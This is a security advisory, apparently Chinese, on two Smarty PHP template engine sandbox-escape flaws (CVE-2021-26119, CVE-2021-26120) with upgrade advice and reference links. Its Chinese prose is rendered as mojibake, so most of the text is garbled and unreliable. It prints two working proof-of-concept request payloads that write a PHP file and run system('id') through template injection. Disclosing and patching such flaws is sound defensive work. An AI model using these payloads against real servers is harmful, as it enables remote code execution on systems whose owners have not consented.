PHP SmartyÄ£°æ´úÂë×¢ÈëÎó²î£¨CVE-2021-26120£©

Ðû²¼Ê±¼ä 2021-02-26

0x00 Îó²î¸ÅÊö

CVE  ID

CVE-2021-26120

ʱ   ¼ä

2021-02-26

Àà   ÐÍ

´úÂë×¢Èë

µÈ   ¼¶

¸ßΣ

Ô¶³ÌʹÓÃ

ÊÇ

Ó°Ïì¹æÄ£

PHP Smarty < 3.1.39

 

0x01 Îó²îÏêÇé

image.png

 

SmartyÊÇͨ¹ýPHP¿ª·¢µÄÄ£°åÒýÇ棬£¬£¬£¬£¬ËüÍÑÀëÁËPHPÂß¼­´úÂëÓëÍâ¹Û£¨HTMLÒ³£©ÒÔ±ãÓÚÖÎÀí¡£¡£¡£

¿ËÈÕ£¬£¬£¬£¬£¬PHP Smarty±»Åû¶±£´æ2¸öPHP´úÂë×¢ÈëÎó²î£¨CVE-2021-26120ºÍCVE-2021-26119£©£¬£¬£¬£¬£¬¹¥»÷Õß¿ÉÒÔͨ¹ýʹÓÃÕâЩÎó²îÀ´×¢Èëí§Òâ´úÂë¡£¡£¡£

template_objectɳÏäÌÓÒÝPHP´úÂë×¢ÈëÎó²î£¨CVE-2021-26119£©

ÔÚSmartyÖУ¬£¬£¬£¬£¬Smarty´Ó$smarty.template_object±äÁ¿»á¼ûʵÀý£¬£¬£¬£¬£¬ÓÉÓÚ¹¥»÷Õß¿ÉÒÔ»á¼ûsmarty»òparentÊôÐÔ£¬£¬£¬£¬£¬´Ó¶ø¿ÉÒÔ»á¼ûSmartyʵÀý¡£¡£¡£ÀÖ³ÉʹÓôËÎó²îµÄ¹¥»÷Õß¿ÉÒÔͨ¹ý½á¹¹¶ñÒâÊý¾Ý£¬£¬£¬£¬£¬×îÖÕÔì³ÉÔ¶³Ì´úÂëÖ´ÐС£¡£¡£

POC´úÂëÈçÏ£¨ÐèÁ½´ÎÔËÐУ¬£¬£¬£¬£¬µÚÒ»´ÎдÈ뻺´æÎļþÈ»ºó½«ÆäÁýÕÖ£¬£¬£¬£¬£¬µÚ¶þ´Î´¥·¢»º´æ²¢°üÀ¨ÎļþÒÔÖ´ÐÐÔ¶³Ì´úÂë¡£¡£¡££©£º

http://localhost:8000/page.php?poc=string:{$s=$smarty.template_object->smarty}{$fp=$smarty.template_object->compiled->filepath}{Smarty_Internal_Runtime_WriteFile::writeFile($fp,"<?php+phpinfo();",$s)}

image.png

 

Smarty_Internal_Runtime_TplFunctionɳÏäÌÓÒÝPHP´úÂë×¢ÈëÎó²î£¨CVE-2021-26120£©

ÓÉÓÚSmartyÔÚ±àÒëÄ£°åÓ﷨ʱ£¬£¬£¬£¬£¬Smarty_Internal_Runtime_TplFunctionÀàÔÚ½ç˵ʱ²»¿É׼ȷ¹ýÂËnameÊôÐÔtplFunctions£¬£¬£¬£¬£¬¹¥»÷Õß¿ÉÒÔͨ¹ý×¢ÈëPayload£¬£¬£¬£¬£¬×îÖÕÔ¶³ÌÖ´ÐдúÂë¡£¡£¡£

PoC´úÂëÈçÏ£º

http://localhost:8000/page.php?poc=string:{function+name='rce(){};system("id");function+'}{/function}

image.png 

 

0x02 ´¦Öóͷ£½¨Òé

ÏÖÔÚ¸ÃÎó²îÒѾ­ÐÞ¸´£¬£¬£¬£¬£¬½¨Òéʵʱ¸üÐÂÉý¼¶µ½3.1.39»ò¸ü¸ß°æ±¾¡£¡£¡£

Á´½ÓÈçÏ£º

https://github.com/smarty-php/smarty/blob/master/CHANGELOG.md

 

0x03 ²Î¿¼Á´½Ó

https://github.com/smarty-php/smarty/security/advisories/GHSA-w5hr-jm4j-9jvq

https://github.com/smarty-php/smarty/security/advisories/GHSA-3rpf-5rqv-689q

https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html

 

0x04 ʱ¼äÏß

2021-02-18  Steven SeeleyÅû¶Îó²î

2021-02-26  VSRCÐû²¼Ç徲ͨ¸æ

 

0x05 ¸½Â¼

 

CVSSÆÀ·Ö±ê×¼¹ÙÍø£ºhttp://www.first.org/cvss/

image.png